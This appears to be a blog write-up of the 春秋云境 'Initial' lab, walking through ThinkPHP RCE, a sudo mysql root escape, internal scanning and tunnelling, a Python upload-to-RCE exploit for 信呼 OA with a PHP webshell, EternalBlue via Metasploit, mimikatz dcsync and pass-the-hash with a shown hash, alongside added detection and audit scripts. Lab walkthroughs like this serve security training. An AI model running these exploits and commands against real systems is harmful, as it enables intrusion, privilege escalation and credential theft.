春秋云境_Initial

Sigh, time to learn.

0x01 Flag01

Target: 39.99.229.166. First a scan of the common ports with 棱镜:

Ports 22 and 8080 are open, and 8080 is an HTTP service. Fingerprinting it with EZ turned up nothing, so scan it with fscan:

ThinkPHP 5.0.23 RCE, so just use a tool:

Connect with AntSword (蚁剑):

After opening a terminal I found the current user is www-data, which has fairly low privileges. Trying privilege escalation first: this machine's MySQL allows passwordless login, and once logged in we can execute commands as root (mysql -e):

sudo mysql -e '\! find / -name flag*'

sudo mysql -e '\! cat /root/flag/flag01.txt'
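The escalation above works because sudo lets www-data run mysql without a password, and mysql's built-in `\!` escape turns that rule into a root shell. The following is an added example (not from the original write-up) that audits sudoers text for passwordless rules of that shape; SAMPLE_SUDOERS is constructed, and SHELL_ESCAPE_BINARIES is a small illustrative subset rather than a complete list.

```python
"""Audit sudoers text for NOPASSWD rules that hand out a root shell.

Added example, not from the original write-up. SAMPLE_SUDOERS is constructed
(its www-data line reproduces the misconfiguration above) and
SHELL_ESCAPE_BINARIES is a small illustrative subset, not a complete list.
"""
import re

# Binaries whose own prompt can run a shell (mysql's "\! cmd" is the one used above).
SHELL_ESCAPE_BINARIES = {"mysql", "vim", "less"}

SAMPLE_SUDOERS = """\
Defaults env_reset
root     ALL=(ALL:ALL) ALL
www-data ALL=(root) NOPASSWD: /usr/bin/mysql
backup   ALL=(root) NOPASSWD: /usr/bin/tar -czf /backup/www.tgz /var/www
"""

# user host=(runas[:group]) [TAG: ...] command[, command ...]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$"
)


def audit_sudoers(text: str) -> list[tuple[str, str, str]]:
    """Return (user, command, reason) for each passwordless rule that yields a root shell."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "Defaults")):
            continue
        m = RULE_RE.match(line)
        if not m or "NOPASSWD" not in m.group("tags"):
            continue
        # "(ALL)", "(ALL:ALL)" and "(root)" all allow running as root.
        runas = m.group("runas").split(":")[0] or "root"
        if runas not in ("root", "ALL"):
            continue
        for cmd in map(str.strip, m.group("cmds").split(",")):
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL":
                findings.append((m.group("user"), cmd, "any command as root"))
            elif binary in SHELL_ESCAPE_BINARIES:
                findings.append((m.group("user"), cmd, f"{binary} has a shell escape"))
    return findings
```

The fix the audit points at is either to drop NOPASSWD or to restrict the rule to a wrapper that cannot reach the mysql prompt.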

0x02 Flag02

Check the network configuration with ifconfig:

(www-data:/var/www/html) $ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.22.1.15 netmask 255.255.0.0 broadcast 172.22.255.255
inet6 fe80::216:3eff:fe05:3164 prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:05:31:64 txqueuelen 1000 (Ethernet)
RX packets 128728 bytes 153547480 (153.5 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 35118 bytes 7563272 (7.5 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 1686 bytes 146020 (146.0 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1686 bytes 146020 (146.0 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

Use AntSword to upload fscan into the same directory the webshell was uploaded to earlier:

Give it execute permission:

sudo mysql -e '\! chmod 777 /var/www/html/fscan*'

Scan the internal network:

./fscan_amd64 -h 172.22.1.0/24
cat result.txt

172.22.1.18:139 open
172.22.1.2:139 open
172.22.1.21:135 open
172.22.1.18:135 open
172.22.1.2:135 open
172.22.1.18:80 open
172.22.1.15:80 open
172.22.1.18:3306 open
172.22.1.21:445 open
172.22.1.18:445 open
172.22.1.2:445 open
172.22.1.2:88 open
172.22.1.21:139 open
172.22.1.15:22 open
[*] NetBios: 172.22.1.2 [+]DC DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] WebTitle: http://172.22.1.15 code:200 len:5578 title:Bootstrap Material Admin
[*] NetInfo:
[*]172.22.1.2
[->]DC01
[->]172.22.1.2
[*] NetInfo:
[*]172.22.1.21
[->]XIAORANG-WIN7
[->]172.22.1.21
[*] NetInfo:
[*]172.22.1.18
[->]XIAORANG-OA01
[->]172.22.1.18
[*] 172.22.1.2 (Windows Server 2016 Datacenter 14393)
[*] WebTitle: http://172.22.1.18 code:302 len:0 title:None 跳转url: http://172.22.1.18?m=login
[*] NetBios: 172.22.1.18 XIAORANG-OA01.xiaorang.lab Windows Server 2012 R2 Datacenter 9600
[+] 172.22.1.21 MS17-010 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios: 172.22.1.21 XIAORANG-WIN7.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] WebTitle: http://172.22.1.18?m=login code:200 len:4012 title:信呼协同办公系统
[+] http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1

Internal network information obtained:

172.22.1.2   DC (domain controller)
172.22.1.21  MS17-010 (EternalBlue)
172.22.1.18  信呼 OA system
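The three-line summary above was read off the raw fscan output by hand. As an added example (not from the original write-up), the parser below turns fscan's result.txt lines into a per-host inventory and lists the hosts with a vulnerability finding; SAMPLE is a constructed excerpt of the output shown above.

```python
"""Parse fscan's result.txt (format as in the scan output above) into a per-host inventory.

Added example, not from the original write-up; SAMPLE is a constructed excerpt
of that output.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

SAMPLE = """\
172.22.1.18:139 open
172.22.1.2:88 open
172.22.1.18:3306 open
172.22.1.21:445 open
[*] NetBios: 172.22.1.2 [+]DC DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] WebTitle: http://172.22.1.18?m=login code:200 len:4012 title:信呼协同办公系统
[+] 172.22.1.21 MS17-010 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios: 172.22.1.21 XIAORANG-WIN7.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[+] http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1
"""

PORT_RE = re.compile(r"^(\d+\.\d+\.\d+\.\d+):(\d+) open$")
NETBIOS_RE = re.compile(r"^\[\*\] NetBios: (\S+) (?:\[\+\]DC )?(\S+) (.+)$")
WEB_RE = re.compile(r"^\[\*\] WebTitle: (\S+) .*?title:(.*)$")
VULN_RE = re.compile(r"^\[\+\] (?:https?://)?(\S+?)(?::\d+)?/? (.+)$")   # "[+] host finding"


def parse_fscan(text: str) -> dict[str, dict]:
    """Return {ip: {ports, hostname, os, dc, web, vulns}} built from fscan output lines."""
    hosts = defaultdict(lambda: {"ports": set(), "hostname": None, "os": None,
                                 "dc": False, "web": {}, "vulns": []})
    for line in text.splitlines():
        line = line.strip()
        if m := PORT_RE.match(line):
            hosts[m[1]]["ports"].add(int(m[2]))
        elif m := NETBIOS_RE.match(line):
            hosts[m[1]].update(hostname=m[2], os=m[3], dc="[+]DC" in line)
        elif m := WEB_RE.match(line):
            # fscan appends "跳转url: ..." after the title on redirects; keep the title only
            hosts[urlsplit(m[1]).hostname]["web"][m[1]] = m[2].split(" 跳转url:")[0].strip()
        elif m := VULN_RE.match(line):
            hosts[m[1]]["vulns"].append(m[2])
    return dict(hosts)


def hosts_with_findings(inventory: dict[str, dict]) -> list[str]:
    """IPs with a vulnerability line, i.e. the hosts to patch or isolate first."""
    return sorted(ip for ip, h in inventory.items() if h["vulns"])
```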

Go after the 信呼 OA first, but that needs a tunnel into the internal network (frp + Proxifier). First upload frpc and frpc.ini with AntSword:

Same as with fscan above, give it execute permission:

chmod +x frpc

Then refer to the proxy configuration.

Once everything is configured, the internal service (172.22.1.18) is reachable:

With a login form like this that has no CAPTCHA, try weak passwords first. admin/admin123 logs in:

After clicking around I still had no idea how to exploit it; later I found there is a ready-made exploit: 代码审计信呼协同办公系统2.2存在文件上传配合云处理函数组合拳RCE (a code-audit post on a file upload combined with the cloud-processing function for RCE in 信呼 OA 2.2).

Sigh, script kiddie:

import requests


session = requests.session()

url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'

data1 = {
'rempass': '0',
'jmpass': 'false',
'device': '1625884034525',
'ltype': '0',
'adminuser': 'YWRtaW4=',
'adminpass': 'YWRtaW4xMjM=',
'yanzm': ''
}


r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})

filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']

url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'

r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)

The content of 1.php here is a one-line webshell:

<?=eval($_POST[1]);?>

When the exp finishes it prints the path the shell was written to (note that this is an absolute path).
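Seen from the web server, the chain above is three requests from one client: the upload to a=upfile&m=upload, the task.php call with m=qcloudCos|runt&a=run, then a request for a .php file under /upload/. This added example (not from the original write-up) walks an access log and alerts on that sequence; the log lines and the upload path in them are constructed.

```python
"""Flag the upload -> cloud-task -> webshell request sequence in web access logs.
Added example, not from the original write-up. The query strings mirror the
requests the exploit above sends; the log lines and upload path are constructed.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs

SAMPLE_LOG = """\
10.0.0.5 - - [03/Jan/2025:17:10:02 +0800] "POST //index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913 HTTP/1.1" 200 143
10.0.0.5 - - [03/Jan/2025:17:10:03 +0800] "GET //task.php?m=qcloudCos%7Crunt&a=run&fileid=11 HTTP/1.1" 200 0
10.0.0.5 - - [03/Jan/2025:17:10:04 +0800] "GET /upload/2025-01/03_171003_1.php?1=system('dir'); HTTP/1.1" 200 512
10.0.0.9 - - [03/Jan/2025:17:11:30 +0800] "POST //index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=1 HTTP/1.1" 200 143
10.0.0.9 - - [03/Jan/2025:17:11:31 +0800] "GET /index.php?m=index&a=home HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def classify(method: str, target: str) -> tuple[str, str]:
    """Return (stage, normalised path); stage is 'upload', 'task', 'shell' or ''."""
    raw_path, _, query = target.partition("?")
    q = {k: v[0] for k, v in parse_qs(query).items()}   # parse_qs also decodes %7C -> |
    path = re.sub(r"/+", "/", raw_path)                  # the exploit sends "//index.php"
    if method == "POST" and q.get("a") == "upfile" and q.get("m") == "upload":
        return "upload", path
    if path.endswith("/task.php") and q.get("a") == "run" and q.get("m", "").startswith("qcloudCos|"):
        return "task", path
    if path.startswith("/upload/") and path.endswith(".php"):
        return "shell", path
    return "", path

def detect_chain(log: str) -> list[dict]:
    """One alert per PHP request under /upload/; 'chain' when upload and task run preceded it."""
    stage = defaultdict(int)          # client -> highest stage reached so far
    alerts = []
    for line in log.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, method, target, status = m.groups()
        kind, path = classify(method, target)
        if kind == "upload" and status == "200":
            stage[client] = max(stage[client], 1)
        elif kind == "task" and stage[client] >= 1:
            stage[client] = 2
        elif kind == "shell":
            severity = "chain" if stage[client] >= 2 else "php_under_upload"
            alerts.append({"client": client, "path": path, "severity": severity})
    return alerts
```

Any successful .php request under /upload/ is already a finding on its own: the upload directory should never execute scripts, which is the control that breaks this chain regardless of the application bug.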

Configure a proxy in AntSword before using it:

Connect AntSword to https://172.22.1.18/upload followed by the string from the output; the flag is at C://Users/Administrator/flag/flag02.txt

After getting flag02 it hints that we should go for the domain controller.

0x03 Flag03

Finally, attack MS17-010, which requires Proxifier + msf

First configure proxychains (using the public-facing server as the proxy into the internal network)

vim /etc/proxychains.conf

Sigh, script kiddie:

proxychains4 msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit

After exploitation we get a bind (forward-connecting) shell

load kiwi

kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit
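The dcsync call above pulls every account's hash by asking the DC to replicate, which the DC records as Security event 4662 with the replication control-access rights on the domain object. This added example (not from the original write-up) flags such events from any principal outside an allowlist of DC computer accounts; EVENTS are constructed records, and the WIN7 machine account is used only because that is where the shell above runs.

```python
"""Flag DCSync-style replication requests in Security event 4662 records.

Added example, not from the original write-up. EVENTS are constructed dicts
holding the fields of a parsed 4662; the GUIDs are the AD control-access rights
a replication (DCSync) request exercises.
"""
DOMAIN_DNS_CLASS = "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}"   # ObjectType of the domain head
REPL_RIGHTS = {
    "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}": "DS-Replication-Get-Changes",
    "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}": "DS-Replication-Get-Changes-All",
    "{89e95b76-444d-4c62-991a-0facbeda640c}": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Constructed sample: legitimate replication by the DC itself, the same rights
# requested by a member server's machine account, then an unrelated 4662.
EVENTS = [
    {"EventID": 4662, "Computer": "DC01.xiaorang.lab", "SubjectUserName": "DC01$",
     "ObjectType": DOMAIN_DNS_CLASS, "AccessMask": "0x100",
     "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "Computer": "DC01.xiaorang.lab", "SubjectUserName": "XIAORANG-WIN7$",
     "ObjectType": DOMAIN_DNS_CLASS, "AccessMask": "0x100",
     "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "Computer": "DC01.xiaorang.lab", "SubjectUserName": "alice",
     "ObjectType": "%{bf967aba-0de6-11d0-a285-00aa003049e2}", "AccessMask": "0x10",
     "Properties": "%%7685\n\t{bf967950-0de6-11d0-a285-00aa003049e2}"},
]


def dcsync_alerts(events: list[dict], replication_allowlist: set[str]) -> list[dict]:
    """One alert per 4662 in which a principal outside the allowlist exercised replication rights."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662 or ev.get("ObjectType", "").lower() != DOMAIN_DNS_CLASS:
            continue
        props = ev.get("Properties", "").lower()
        rights = [name for guid, name in REPL_RIGHTS.items() if guid in props]
        if not rights or ev.get("SubjectUserName", "").upper() in replication_allowlist:
            continue
        alerts.append({"subject": ev["SubjectUserName"], "rights": rights, "dc": ev.get("Computer")})
    return alerts
```

The allowlist must hold the upper-cased names of every DC computer account plus any sanctioned sync account; a member server or user exercising these rights is the signal.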

With the administrator's hash in hand, pass the hash:

proxychains crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

Learning as I went, the whole thing took more than five hours 😪


Source: http://example.com/2025/01/01/春秋云境_Initial/
Author: notbad3
Published: January 1, 2025